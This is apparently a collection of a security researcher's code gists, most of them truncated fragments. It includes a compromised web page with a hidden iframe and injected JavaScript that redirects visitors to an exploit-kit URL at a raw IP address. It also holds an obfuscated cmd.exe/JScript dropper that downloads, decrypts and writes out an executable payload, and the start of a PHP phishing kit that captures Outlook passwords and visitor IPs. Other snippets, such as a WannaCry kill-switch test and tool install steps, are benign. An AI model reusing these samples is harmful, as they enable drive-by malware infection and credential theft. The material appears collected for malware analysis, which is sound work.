brad-anton

<HEAD>
</HEAD>

<BODY BGCOLOR="WHITE">
<CENTER>
<iframe width="0" scrolling="no" height="0" frameborder="0" src="" seamless="seamless">
<H1>A Simple Sample Web Page</H1>

If you would like to make a link or bookmark to this page, the URL is:<BR> http://sheldonbrown.com/web_sample1.html

brad-anton

$("body").remove();$("html").append("body").html("<div style=\"\"></div>");window.location.href = "http://194.58.38.103/sploit/flow3.php"

brad-anton

cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=0x24;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y.setProxy(n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,S="etofile",a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinH"+"TTP",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v["charCo"+"deAt"](027+v[M]("PE\x00\x00"));s.WriteText

brad-anton

/*
    A simple test to check the behavior of WannaCry's Kill Switch
    functionality. Compile with Visual Studio.
    @brad_anton
    
    Example Run:
    Set DNS to 208.67.222.222
    
    C:\Users\user\Desktop\WannaCryTest\Debug>WannaCryTest.exe
    GOOD: WannaCry would have been aborted!

brad-anton

GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache

brad-anton

sudo apt-get install cmake
curl -L -O https://github.com/trendmicro/tlsh/archive/v3.4.5.zip
unzip v3.4.5.zip
cd tlsh-3.4.5/
bash make.sh

Python module

brad-anton

import httplib2
import os
import base64
import email
import re

from apiclient import errors
from apiclient import discovery
from oauth2client import client
from oauth2client import tools

brad-anton

<?php

$ip = getenv("REMOTE_ADDR");

//Get IP Country City
$url = "http://api.ipinfodb.com/v3/ip-country/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip";
$url = "http://api.ipinfodb.com/v3/ip-city/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip";
$ipCountryCityInfo = file_get_contents($url);
//

brad-anton

Client Library

An example client library can be found in client.py. To use:

>>> from client import ektracker_client
>>> e = ektracker_client('your_api_key') 

>>> e.add_tag('rig', 'rig exploit kit', [ 'http://www.google.com/', 'http://www.test.com' ], ['.*', '[a-f]{1,}'])
Uploading Tag: {'signatures': ['.*', '[a-f]{1,}'], 'references': ['http://www.google.com/', 'http://www.test.com'], 'name': 'rig', 'description': 'rig exploit kit'}

brad-anton

<?php

session_start();
$country = visitor_country();
$ip = $_SERVER['REMOTE_ADDR'];
$login = $_SESSION['clientemail'];
$passwd = $_POST['passwd'];
$sender = 'Hotmail-3D@serverX.com';
$over = 'https://outlook.live.com/owa/?path=/mail/inbox';